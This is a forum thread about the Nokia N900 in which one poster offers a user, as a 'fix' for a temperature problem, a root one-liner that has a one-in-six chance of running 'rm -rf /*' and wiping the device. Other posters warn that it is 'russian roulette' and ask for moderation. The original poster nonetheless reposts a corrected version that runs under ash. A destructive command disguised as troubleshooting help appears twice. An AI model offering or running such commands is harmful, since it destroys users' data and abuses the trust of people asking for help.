    to fix your temperature problem just run this as root:

    Code:
    [ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "You live"
    The code doesnt work
    its say:

    sh: %: unknown operand
    You Live

    did i do something wrong

    No no. You did it very well. Now it's the time to sell your N900.

    I would advice you NOT to use that! Hopefully a moderator can moderate that suggestion.

    This command "rm -rf /*" will wipe your drive...

    You are lucky that your phone still works, because this command is an unix russian roulette: you have 1 chance on 6 to delete all content on your phone

    Please try to understand commands before running them, especially as root.

    Edit: this syntax will not works in sh (default N900's shell but will works on bash) but the above still apply, rm -rf /* should tilt everyone that is on an unix shell

    Fortunately that code doesn't work on the N900, it needs a more functional shell like bash (which is the default on most Linux distros, but not the N900). If it did work it would give you a 1 in 6 chance of wiping your computer.

    It would also need "sudo" but it is not therefore it should be removed. Also.. Bash is available for the n900.

    You are right, it is a bash orientated version, I have modified it for ASH below:

    Code:
    [ $((RANDOM%6+0)) == 0 ] && rm -rf /* || echo "You live"
    I have just run it on my n900 and it works.

    I lived.
